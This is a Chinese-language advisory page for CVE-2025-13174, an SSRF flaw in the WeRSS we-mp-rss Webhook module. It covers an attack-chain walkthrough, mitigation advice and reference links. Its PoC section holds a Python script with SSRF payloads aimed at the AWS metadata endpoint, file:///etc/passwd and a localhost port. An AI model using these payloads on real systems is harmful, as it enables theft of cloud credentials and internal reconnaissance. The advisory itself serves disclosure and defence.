CVE-2025-13174 CVSS 6.3 中危

CVE-2025-13174 WeRSS we-mp-rss Webhook模块SSRF漏洞

披露日期: 2025-11-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13174

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

rachelos WeRSS we-mp-rss

漏洞概述

CVE-2025-13174是rachelos开源项目WeRSS的we-mp-rss组件中存在的服务器端请求伪造（SSRF）漏洞。该漏洞影响we-mp-rss 1.4.7及之前版本，存在于Webhook模块的do_job函数中。攻击者可以通过操纵web_hook_url参数，使服务器向任意URL发起请求，从而访问内部系统资源、读取敏感数据或对内部服务发起攻击。由于该漏洞可远程利用且已公开PoC，，建议相关用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞位于rachelos/we-mp-rss项目中的jobs/mps.py文件的do_job函数。漏洞根源在于WebHook模块对用户提供的web_hook_url参数缺乏充分的输入验证。攻击者可以构造恶意的URL（如内网IP地址、file://协议或其他内部服务地址）作为web_hook_url参数值。当do_job函数执行时，会使用该参数发起HTTP请求，从而导致服务器端请求伪造。攻击者可以利用此漏洞探测内网服务、读取本地文件（通过file://协议）、访问云元数据服务（AWS EC2元数据等）或对内部系统进行端口扫描。由于该漏洞需要低权限认证，攻击门槛相对较低。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统使用rachelos WeRSS we-mp-rss组件，版本 <= 1.4.7

STEP 2

步骤2: 漏洞定位

访问Webhook模块的do_job函数接口，该函数接受web_hook_url参数

STEP 3

步骤3: 构造恶意请求

构造包含恶意URL的web_hook_url参数，可指向内网IP、云元数据端点或本地文件

STEP 4

步骤4: 发起SSRF攻击

发送恶意请求，服务器执行do_job函数，发起对攻击者指定URL的请求

STEP 5

步骤5: 读取响应数据

服务器返回内部资源内容，攻击者获取敏感信息或完成内网探测

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13174 SSRF PoC
# Target: rachelos WeRSS we-mp-rss <= 1.4.7

target_url = "http://target.com/api/do_job"

# SSRF payload - Internal metadata service
ssrf_payload = {
    "web_hook_url": "http://169.254.169.254/latest/meta-data/"
}

# SSRF payload - Local file access
file_ssrf_payload = {
    "web_hook_url": "file:///etc/passwd"
}

# SSRF payload - Internal port scan
internal_scan_payload = {
    "web_hook_url": "http://127.0.0.1:22"
}

# Send exploit
response = requests.post(target_url, json=ssrf_payload)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

影响范围

we-mp-rss <= 1.4.7

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 禁用或限制Webhook模块的访问权限；2) 在网络层实施严格的出站请求过滤规则，阻止对内网地址的访问；3) 监控和日志记录所有web_hook_url参数的请求，及时发现异常攻击行为；4) 对API接口实施更严格的认证和授权控制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13174
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13174
3 Details https://www.cvedetails.com/cve/CVE-2025-13174/
4 VulDB https://vuldb.com/cve/CVE-2025-13174
5 Link https://vuldb.com/?ctiid.332465
6 Link https://vuldb.com/?id.332465
7 Link https://vuldb.com/?submit.684803
8 Link https://www.notion.so/SSRF-vulnerability-in-WeRSS-WebHook-module-29bea92a3c4180a192b5caa9078bfb18

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表